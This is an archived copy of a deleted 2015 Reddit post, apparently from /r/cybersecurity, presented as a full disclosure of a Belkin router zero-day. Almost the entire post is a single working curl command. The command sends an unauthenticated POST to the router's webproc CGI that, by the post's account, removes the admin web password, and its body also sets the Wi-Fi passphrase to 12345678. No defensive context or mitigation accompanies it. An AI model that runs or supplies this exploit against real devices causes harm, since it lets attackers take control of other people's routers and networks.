Belkin Routers 0day Full Disclosure

This comment was posted to reddit on Dec 03, 2015 at 10:40 am and was deleted within 9 hour(s) and 45 minutes.

Belkin Routers 0day Full Disclosure

Sample curl to remove the web GUI password without authentication:

curl -i -s -k -X 'POST' \ -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Referer: http://192.168.2.1/wireless_security.htm' \ --data-binary $'obj-action=set&var%3Apage=wireless_security&var%3Amenu=wireless&errorpage=html%2Fpage%2Fportforwd.ajax.js&var%3ACacheLastData=U0VMRUNUX1NlY3VyaXR5b3B0aW9ucz13cGF8U0VMRUNUX1dwYU1vZGU9V1BBMi1QU0t8cG1haW5mMDAwMT1lbl91c3x3bF93cGEyX3BzazE9cGFzc3dvcmR8cHNrX29ic2N1cmU9ZmFsc2V8SU5QVVRfcmFkaW9pbmRleDE9ZmFsc2V8MWtleTE9fDFrZXkyPXwxa2V5Mz18MWtleTQ9fDFrZXk1PXwxa2V5Nj18MWtleTc9fDFrZXk4PXwxa2V5OT18MWtleTEwPXwxa2V5MTE9fDFrZXkxMj18MWtleTEzPXxJTlBVVF9yYWRpb2luZGV4Mj1mYWxzZXwya2V5MT18MmtleTI9fDJrZXkzPXwya2V5ND18MmtleTU9fDJrZXk2PXwya2V5Nz18MmtleTg9fDJrZXk5PXwya2V5MTA9fDJrZXkxMT18MmtleTEyPXwya2V5MTM9fElOUFVUX3JhZGlvaW5kZXgzPWZhbHNlfDNrZXkxPXwza2V5Mj18M2tleTM9fDNrZXk0PXwza2V5NT18M2tleTY9fDNrZXk3PXwza2V5OD18M2tleTk9fDNrZXkxMD18M2tleTExPXwza2V5MTI9fDNrZXkxMz18SU5QVVRfcmFkaW9pbmRleDQ9ZmFsc2V8NGtleTE9fDRrZXkyPXw0a2V5Mz18NGtleTQ9fDRrZXk1PXw0a2V5Nj18NGtleTc9fDRrZXk4PXw0a2V5OT18NGtleTEwPXw0a2V5MTE9fDRrZXkxMj18NGtleTEzPXxwYXNzcGhyYXNlU3RyV2VwMTA0PXxJTlBVVF9yYWRpb2tleTE9ZmFsc2V8RU5DMTE9NTF8RU5DMTI9YzB8RU5DMTM9OWJ8RU5DMTQ9MDJ8RU5DMTU9OTZ8SU5QVVRfcmFkaW9rZXkxPWZhbHNlfEVOQzIxPTY4fEVOQzIyPTQ3fEVOQzIzPTI1fEVOQzI0PTg5fEVOQzI1PTE1fElOUFVUX3JhZGlva2V5Mz1mYWxzZXxFTkMzMT0zZXxFTkMzMj04YnxFTkMzMz1iYnxFTkMzND05M3xFTkMzNT1iZnxJTlBVVF9yYWRpb2tleTQ9ZmFsc2V8RU5DNDE9NGR8RU5DNDI9ZTF8RU5DNDM9MWN8RU5DNDQ9NzR8RU5DNDU9ODJ8cGFzc3BocmFzZVN0cldlcDQwPXxwMTIwMVBhc3N3b3JkPQ%3D%3D&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAObscurePSK=0&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType=11i&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes=AESEncryption&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode=PSKAuthentication&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase=12345678&%3AInternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WEPEncFlag=0' \ 'http://192.168.2.1/cgi-bin/webproc?getpage=html/page/portforwd.ajax.js&var:page=*&timestamp=1446785921908'

/r/cybersecurity Thread

Belkin Routers 0day Full Disclosure

Recently removed from /r/cybersecurity

More Random Comments